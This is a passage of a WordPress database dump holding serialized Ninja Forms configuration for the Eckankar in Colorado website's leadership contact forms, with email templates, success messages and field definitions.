width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_69},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Northwest Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_69}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_70}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_71}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_72}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_73}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_76}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_77}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:70;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:16\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:71;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:16\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:44:\"Northwest Colorado Leadership Communications\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3859:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Northwest Colorado Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Northwest Colorado Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_69}Â {field:lastname_70}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_69}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_70}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_71}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_72}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_73}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_76}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_77}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:72;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:39:\"Mountain Area Leadership Communications\";s:10:\"created_at\";s:19:\"2019-07-15 14:06:45\";s:10:\"form_title\";s:44:\"Northwest Colorado Leadership Communications\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 18:26:58\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"1\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:12:{i:0;s:7:\"html_68\";i:1;s:10:\"textbox_69\";i:2;s:11:\"lastname_70\";i:3;s:8:\"email_71\";i:4;s:8:\"phone_72\";i:5;s:13:\"listselect_73\";i:6;s:5:\"hr_74\";i:7;s:7:\"html_75\";i:8;s:13:\"listselect_76\";i:9;s:11:\"textarea_77\";i:10;s:18:\"html_1663800517759\";i:11;s:9:\"submit_79\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(19,'a:7:{s:2:\"id\";i:19;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:11:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1264:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Mountain Area Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1262:\"<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Mountain Area Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:8:\"html_153\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_153\";}s:2:\"id\";i:199;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_154\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_154\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:200;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_155\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_155\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:201;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_156\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_156\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:202;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_157\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_157\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:203;}i:5;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 